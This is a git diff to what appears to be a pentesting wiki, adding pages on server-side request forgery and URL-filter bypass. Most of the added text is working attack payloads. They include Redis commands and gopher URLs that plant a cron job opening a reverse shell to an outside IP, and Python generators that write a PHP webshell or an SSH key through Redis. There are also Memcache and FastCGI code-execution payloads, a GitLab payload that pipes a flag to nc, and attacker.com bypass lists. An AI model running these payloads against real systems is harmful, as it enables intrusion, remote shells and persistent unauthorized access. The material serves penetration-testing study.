"-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true} +``` + +Replace alpine with an arbitrary image you would like the docker container to run. + +## Gitlab Prometheus Redis Exporter + +**Commonly bound ports: 9121** + +This vulnerability affects Gitlab instances before version 13.1.1. According to the [Gitlab documentation](https://docs.gitlab.com/ee/administration/monitoring/prometheus/#configuring-prometheus) `Prometheus and its exporters are on by default, starting with GitLab 9.0.` + +These exporters provide an excellent method for an attacker to pivot and attack other services using CVE-2020-13379. One of the exporters which is easily exploited is the Redis Exporter. + +The following endpoint will allow an attacker to dump all the keys in the redis server provided via the target parameter: + +```bash +http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=* +``` + +*** + +**Possible via Gopher** + +## Redis + +**Commonly bound port: 6379** + +Recommended reading: + +* [Trying to hack Redis via HTTP requests](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html) +* [SSRF Exploits against Redis](https://maxchadwick.xyz/blog/ssrf-exploits-against-redis) + +**RCE via Cron** - [Gopher Attack Surfaces](https://blog.chaitin.cn/gopher-attack-surfaces/) + +```bash +redis-cli -h $1 flushall +echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1\n\n"|redis-cli -h $1 -x set 1 +redis-cli -h $1 config set dir /var/spool/cron/ +redis-cli -h $1 config set dbfilename root +redis-cli -h $1 save +``` + +Gopher: + +```bash +gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a +``` + +**RCE via Shell Upload (PHP)** - [Redis Getshell Summary](https://www.mdeditor.tw/pl/pBy0) + +```python +#!/usr/bin/env python +# -*-coding:utf-8-*- + +import urllib +protocol="gopher://" +ip="192.168.189.208" +port="6379" +shell="\n\n\n\n" +filename="shell.php" +path="/var" +passwd="" + +cmd=["flushall", + "set 1 {}".format(shell.replace(" ","${IFS}")), + "config set dir {}".format(path), + "config set dbfilename {}".format(filename), + "save" + ] +if passwd: + cmd.insert(0,"AUTH {}".format(passwd)) +payload=protocol+ip+":"+port+"/_" +def redis_format(arr): + CRLF="\r\n" + redis_arr = arr.split(" ") + cmd="" + cmd+="*"+str(len(redis_arr)) + for x in redis_arr: + cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ") + cmd+=CRLF + return cmd + +if __name__=="__main__": + for x in cmd: + payload += urllib.quote(redis_format(x)) + print payload +``` + +**RCE via authorized\_keys** - [Redis Getshell Summary](https://www.mdeditor.tw/pl/pBy0) + +```python +import urllib +protocol="gopher://" +ip="192.168.189.208" +port="6379" +# shell="\n\n\n\n" +sshpublic_key = "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8IOnJUAt5b/5jDwBDYJTDULjzaqBe2KW3KhqlaY58XveKQRBLrG3ZV0ffPnIW5SLdueunb4HoFKDQ/KPXFzyvVjqByj5688THkq1RJkYxGlgFNgMoPN151zpZ+eCBdFZEf/m8yIb3/7Cp+31s6Q/DvIFif6IjmVRfWXhnkjNehYjsp4gIEBiiW/jWId5yrO9+AwAX4xSabbxuUyu02AQz8wp+h8DZS9itA9m7FyJw8gCrKLEnM7PK/ClEBevDPSR+0YvvYtnUxeCosqp9VrjTfo5q0nNg9JAvPMs+EA1ohUct9UyXbTehr1Bdv4IXx9+7Vhf4/qwle8HKali3feIZ root@kali\n\n" +filename="authorized_keys" +path="/root/.ssh/" +passwd="" +cmd=["flushall", + "set 1 {}".format(sshpublic_key.replace(" ","${IFS}")), + "config set dir {}".format(path), + "config set dbfilename {}".format(filename), + "save" + ] +if passwd: + cmd.insert(0,"AUTH {}".format(passwd)) +payload=protocol+ip+":"+port+"/_" +def redis_format(arr): + CRLF="\r\n" + redis_arr = arr.split(" ") + cmd="" + cmd+="*"+str(len(redis_arr)) + for x in redis_arr: + cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ") + cmd+=CRLF + return cmd + +if __name__=="__main__": + for x in cmd: + payload += urllib.quote(redis_format(x)) + print payload +``` + +**RCE on GitLab via Git protocol** + +Great writeup from Liveoverflow [here](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/). + +While this required authenticated access to GitLab to exploit, I am including the payload here as the `git` protocol may work on the target you are hacking. This payload is for reference. + +```bash +git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git +``` + +## Memcache + +**Commonly bound port: 11211** + +* [vBulletin Memcache RCE](https://www.exploit-db.com/exploits/37815) +* [GitHub Enterprise Memcache RCE](https://www.exploit-db.com/exploits/42392) +* [Example Gopher payload for Memcache](https://blog.safebuff.com/2016/07/03/SSRF-Tips/#SSRF-memcache-Getshell) + +```bash +gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a +gopher://192.168.10.12:11211/_%0d%0adelete ssrftest%0d%0a +``` + +## Apache Tomcat + +**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)** + +Effective against Tomcat 6 only: + +[gopher-tomcat-deployer](https://github.com/pimps/gopher-tomcat-deployer) + +CTF writeup using this technique: + +[From XXE to RCE: Pwn2Win CTF 2018 Writeup](https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/) + +## FastCGI + +**Commonly bound ports: 80,443 (SSL)** + +This was taken from [here](https://blog.chaitin.cn/gopher-attack-surfaces/). + +```bash +gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/172.19.23.228/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00 +``` + +## Java RMI + +**Commonly bound ports: 1090,1098,1099,1199,4443-4446,8999-9010,9999** + +Blind _SSRF_ vulnerabilities that allow arbitrary bytes (_gopher based_) can be used to perform deserialization or codebase attacks on the _Java RMI_ default components (_RMI Registry_, _Distributed Garbage Collector_, _Activation System_). A detailed writeup can be found [here](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/). The following listing shows an example for the payload generation: + +``` +$ rmg serial 127.0.0.1 1090 CommonsCollections6 'curl example.burpcollaborator.net' --component reg --ssrf --gopher +[+] Creating ysoserial payload... done. +[+] +[+] Attempting deserialization attack on RMI Registry endpoint... +[+] +[+] SSRF Payload: gopher://127.0.0.1:1090/_%4a%52%4d%49%00%02%4c%50%ac%ed%00%05%77%22%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%02%44%15%4d[...] +``` diff --git a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md new file mode 100644 index 000000000..15cff3fee --- /dev/null +++ b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md @@ -0,0 +1,187 @@ +# URL Format Bypass + +### Localhost + +```bash +## Localhost +http://127.0.0.1:80 +http://127.0.0.1:443 +http://127.0.0.1:22 +http://127.1:80 +http://0 +http://0.0.0.0:80 +http://localhost:80 +http://[::]:80/ +http://[::]:25/ SMTP +http://[::]:3128/ Squid +http://[0000::1]:80/ +http://[0:0:0:0:0:ffff:127.0.0.1]/thefile +http://①②⑦.⓪.⓪.⓪ + +## CDIR bypass +http://127.127.127.127 +http://127.0.1.3 +http://127.0.0.0 + +# Dot bypass +127。0。0。1 +127%E3%80%820%E3%80%820%E3%80%821 + +## Decimal bypass +http://2130706433/ = http://127.0.0.1 +http://3232235521/ = http://192.168.0.1 +http://3232235777/ = http://192.168.1.1 + +## Octal Bypass +http://0177.0000.0000.0001 +http://00000177.00000000.00000000.00000001 +http://017700000001 + +## Hexadecimal bypass +127.0.0.1 = 0x7f 00 00 01 +http://0x7f000001/ = http://127.0.0.1 +http://0xc0a80014/ = http://192.168.0.20 +0x7f.0x00.0x00.0x01 +0x0000007f.0x00000000.0x00000000.0x00000001 + +## You can also mix different encoding formats +## https://www.silisoftware.com/tools/ipconverter.php + +## Malformed and rare +localhost:+11211aaa +localhost:00011211aaaa +http://0/ +http://127.1 +http://127.0.1 + +## DNS to localhost +localtest.me = 127.0.0.1 +customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1 +mail.ebc.apple.com = 127.0.0.6 (localhost) +127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP) +www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com +http://customer1.app.localhost.my.company.127.0.0.1.nip.io +http://bugbounty.dod.network = 127.0.0.2 (localhost) +1ynrnhl.xip.io == 169.254.169.254 +spoofed.burpcollaborator.net = 127.0.0.1 +``` + +![](<../../.gitbook/assets/image (649).png>) + +### Domain Parser + +```bash +https:attacker.com +https:/attacker.com +http:/\/\attacker.com +https:/\attacker.com +//attacker.com +\/\/attacker.com/ +/\/attacker.com/ +/attacker.com +%0D%0A/attacker.com +#attacker.com +#%20@attacker.com +@attacker.com +attacker%00.com +attacker%E3%80%82com +attacker。com +ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ +``` + +``` +① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ +⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ +⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ +⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ +Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ +ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ +``` + +### Domain Confusion + +```bash +# Try also to change attacker.com for 127.0.0.1 to try to access localhost +http://{domain}@attacker.com +http://{domain}%6D@attacker.com +https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com +http://attacker.com#{domain} +http://{domain}.attacker.com +http://attacker.com/{domain} +http://attacker.com/?d={domain} +https://{domain}@attacker.com +https://attacker.com#{domain} +https://{domain}.attacker.com +https://attacker.com/{domain} +https://attacker.com/?d={domain} +http://{domain}@attacker.com +http://attacker.com#{domain} +http://{domain}.attacker.com +http://attacker.com/{domain} +http://attacker.com/?d={domain} +http://attacker.com%00{domain} +http://attacker.com?{domain} +http://attacker.com///{domain} +https://attacker.com%00{domain} +https://attacker.com%0A{domain} +https://attacker.com?{domain} +https://attacker.com///{domain} +https://attacker.com\{domain}/ +https://attacker.com;https://{domain} +https://attacker.com\{domain}/ +https://attacker.com\.{domain} +https://attacker.com/.{domain} +https://attacker.com\@@{domain} +https://attacker.com:\@@{domain} +https://attacker.com#\@{domain} +https://attacker.com\anything@{domain}/ + +# On each IP position try to put 1 attackers domain and the others the victim domain +http://1.1.1.1 &@2.2.2.2# @3.3.3.3/ + +#Parameter pollution +next={domain}&next=attacker.com +``` + +### Bypass via redirect + +It might be possible that the server is **filtering the original request** of a SSRF **but not** a possible **redirect** response to that request.\ +For example, a server vulnerable to SSRF via: `url=https://www.google.com/` might be **filtering the url param**. But if you uses a [python server to respond with a 302](https://pastebin.com/raw/ywAUhFrv) to the place where you want to redirect, you might be able to **access filtered IP addresses** like 127.0.0.1 or even filtered **protocols** like gopher.\ +[Check out this report.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530) + +```python +#!/usr/bin/env python3 + +#python3 ./redirector.py 8000 http://127.0.0.1/ + +import sys +from http.server import HTTPServer, BaseHTTPRequestHandler + +if len(sys.argv)-1 != 2: + print("Usage: {} ".format(sys.argv[0])) + sys.exit() + +class Redirect(BaseHTTPRequestHandler): + def do_GET(self): + self.send_response(302) + self.send_header('Location', sys.argv[2]) + self.end_headers() + +HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever() +``` + +## Explained Tricks + +### Blackslash-trick + +In short, the _backslash-trick_ relies on exploiting a minor difference between two “URL” specifications: the [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing), and [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). RFC3986 is a generic, multi-purpose specification for the syntax of _Uniform Resource Identifiers_, while the WHATWG URL Standard is specifically aimed at the Web, and at URLs (which are a subset of URIs). Modern browsers implement the WHATWG URL Standard. + +Both of them describe a way of parsing URI/URLs, with one slight difference. The WHATWG specification describes [one extra character](https://url.spec.whatwg.org/#authority-state), the `\`, which behaves just like `/`: ends the hostname & authority and starts the path of the URL. + +![The two specifications parsing the same URL differently](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg) + +### Other Confusions + +![](<../../.gitbook/assets/image (629).png>) + +image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/) diff --git a/pentesting-web/web-vulnerabilities-methodology.md b/pentesting-web/web-vulnerabilities-methodology.md index 25b22f39f..0ea550238 100644 --- a/pentesting-web/web-vulnerabilities-methodology.md +++ b/pentesting-web/web-vulnerabilities-methodology.md @@ -35,7 +35,7 @@ If the introduced data may somehow being reflected in the response, the page mig * [ ] [**Open Redirect**](open-redirect.md)**** * [ ] ****[**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)**** * [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)**** -* [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery.md)**** +* [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery/)**** * [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/)**** * [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md)**** * [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)**** diff --git a/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md b/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md index 55008183c..f6d3d3a4e 100644 --- a/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md +++ b/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md @@ -128,7 +128,7 @@ for(let i=0; i<1000; i++) { ``` -### [SSRF](../ssrf-server-side-request-forgery.md) +### [SSRF](../ssrf-server-side-request-forgery/) This vulnerability can be transformed very easily in a SSRF (as you can make the script load external resources). So just try to exploit it (read some metadata?). diff --git a/pentesting/pentesting-web/buckets/aws-s3.md b/pentesting/pentesting-web/buckets/aws-s3.md index 5df8d3284..76d088052 100644 --- a/pentesting/pentesting-web/buckets/aws-s3.md +++ b/pentesting/pentesting-web/buckets/aws-s3.md @@ -24,7 +24,7 @@ Prerequisites, at least you need awscli sudo apt install awscli ``` -You can get your credentials here [https://console.aws.amazon.com/iam/home?#/security_credential](https://console.aws.amazon.com/iam/home?#/security_credential) but you need an aws account, free tier account : [https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/](https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/) +You can get your credentials here [https://console.aws.amazon.com/iam/home?#/security\_credential](https://console.aws.amazon.com/iam/home?#/security\_credential) but you need an aws account, free tier account : [https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free\_np/](https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free\_np/) ``` aws configure --profile @@ -105,7 +105,7 @@ If you find some private AWS keys, you can create a profile using those: aws configure --profile flawscloud ``` -Notice that if you find a users credentials in the meta-data folder, you will need to add the _aws_session_token_ to the profile. +Notice that if you find a users credentials in the meta-data folder, you will need to add the _aws\_session\_token_ to the profile. ### Get buckets @@ -245,7 +245,7 @@ The above command will list the disk you attached to your instance. ## SSRF attacks through AWS -If you want to read about how can you exploit meta-data in AWS [you should read this page](../../../pentesting-web/ssrf-server-side-request-forgery.md#abusing-ssrf-in-aws-environment) +If you want to read about how can you exploit meta-data in AWS [you should read this page](../../../pentesting-web/ssrf-server-side-request-forgery/#abusing-ssrf-in-aws-environment) ## Tools to scan the configuration of buckets **or to discover buckets**